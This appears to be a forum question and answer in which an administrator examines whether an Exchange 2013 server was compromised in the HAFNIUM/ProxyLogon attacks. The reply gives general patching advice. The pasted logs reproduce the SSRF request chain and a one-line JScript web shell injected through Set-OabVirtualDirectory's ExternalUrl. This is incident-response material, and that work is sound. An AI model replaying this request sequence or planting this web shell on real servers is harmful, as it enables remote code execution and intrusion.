Exchange 2013 HAFNIUM attack: based on these factors, is this server compromised?

Question

Last week, a server running (only) Exchange Server 2013 was hit with probes from the ongoing HAFNIUM-style attack.

We ran the Health Checker script provided by Microsoft and found that we needed to upgrade. We upgraded to Exchange Server 2013 CU23 and applied all patches starting at around mid-day 2021-03-04. The upgrade was successful aside from needing to restart the Frontend transport service manually. After this, the same Health Checker script no longer lists any updates missing, and lists the KB500871 patch.

We have also run the Test-ProxyLogon.ps1 script provided by Microsoft, and it has produced a log file with a name ending in Cve-2021-26855.csv which is just one of the four CVEs involved. Some guidance is given to interpreting this log file, but not much and that's why I'm here.

This file lists various probes to autodiscover/autodiscover.xml, but also some to ecp/proxyLogon.ecp and then to various DDI/DDIService.svc endpoints, which looks to be the worrying part. (No such activity after the patch.) Here's what the .csv file shows:

"2021-03-04T08:58:32.625Z","30b797e4-c47d-42a5-9367-511c90f92305","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/autodiscover/autodiscover.xml?#","200"
"2021-03-04T08:58:33.969Z","44ebe2f7-47e4-468f-9f9a-47487faa7c95","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/mapi/emsmdb/?#","200"
"2021-03-04T08:58:37.031Z","3b0d1023-5972-477b-87e5-97936e34b120","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/proxyLogon.ecp?#","241"
"2021-03-04T08:58:51.547Z","56fc732f-d802-4d53-8960-0a39c3819e24","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory#","200"
"2021-03-04T08:59:07.344Z","7c2ee687-d1e5-45f1-8f03-7c99d46bb889","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
"2021-03-04T08:59:08.876Z","35530698-2402-415c-9717-0cd61709225d","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory#","200"
"2021-03-04T08:59:11.047Z","2f5e6b62-f04d-4850-8044-4c59d15fc1d3","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"

Here's what the server logs in %EXCHANGEPATH%\V15\Logging\ECP\Server show:

2021-03-04T08:58:49.906Z,EXCHSRVNAME,ECP.Request,S:TIME=539;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-ActiveSyncVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.063Z,EXCHSRVNAME,ECP.Request,S:TIME=147;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-AutodiscoverVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.156Z,EXCHSRVNAME,ECP.Request,S:TIME=78;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-EcpVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.235Z,EXCHSRVNAME,ECP.Request,S:TIME=77;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.438Z,EXCHSRVNAME,ECP.Request,S:TIME=201;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OwaVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.516Z,EXCHSRVNAME,ECP.Request,S:TIME=67;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-WebServicesVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.610Z,EXCHSRVNAME,ECP.Request,S:TIME=80;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-PowershellVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:51.422Z,EXCHSRVNAME,ECP.Request,S:TIME=705;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Pipeline.1|Get-MailboxRegionalConfiguration;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:07.219Z,EXCHSRVNAME,ECP.Request,"S:TIME=14186;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""i3QynV""],""unsafe"");}</script>''.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=0;S:BLD=15.0.1044.25"
2021-03-04T08:59:07.297Z,EXCHSRVNAME,ECP.Request,S:TIME=64;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.547Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=1650;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OABVirtualDirectory.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.938Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=367;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-ExchangeServer.Identity=''EXCHSRVNAME''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.954Z,EXCHSRVNAME,ECP.Request,S:TIME=692;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:11.016Z,EXCHSRVNAME,ECP.Request,S:TIME=60;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:14.579Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=3641;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:23.391Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=8804;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''EXCHSRVNAME''.Role=''ClientAccess''.InternalURL=''https://EXCHSRVNAME.redacted.domain/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:23.454Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=59;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25

As far as I can understand, this injected and made visible a web shell. However - according to the log in ESET Mail Security (antivirus software), the file in question (named RedirSuiteServerProxy.aspx) was intercepted as w3wp.exe (IIS) was attempting to retrieve it, and was deleted due to being a known "JS/Exploit.CVE-2021-26855.Webshell.A trojan". The name of the file also does not appear in any of the IIS access logs. The IP address associated with these requests (anonymized as 666.666.666.666) does appear, but only with lines directly corresponding to those requests, and not to something else that would indicate actually accessing and using the web shell.

I have run the recently updated MSERT/Microsoft Safety Scanner 1.0.3001.0, and its full scan gives a clean bill of health. Aside from that, I have also checked for known event log events that would have been posted by the three other vulnerabilities, and none of them can be found by me or by the previously mentioned script, which checks for them. I have double checked that no new users or groups have appeared, or existing users been moved to privileged groups either locally or within the domain. I have also checked for various other signs as detailed on Microsoft's page, like newly created .aspx files, .zip/.rar/.7z files in C:\ProgramData\ as used for exfiltration, and so on.

With all this in mind, my question is: did the attack do anything beyond creating a web shell which the antivirus software promptly stopped from being used; did the absence of signs of the other CVEs mean it never escalated to those steps; and are there further things to look into?

Answer 1

According to my research, these vulnerabilities are used as part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Patching Exchange Servers immediately is the best first step. Other temporary options can include protection by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack; other portions of the attack chain can be triggered if an attacker already has access or can convince an administrator to run a malicious file.

And the security update release contains fixes for seven security vulnerabilities affecting Exchange Server. Of these, four vulnerabilities were known to have been used in limited, targeted attacks against on-premises Exchange servers.

In addition, the blog Web shell attacks continue to rise may be helpful to you.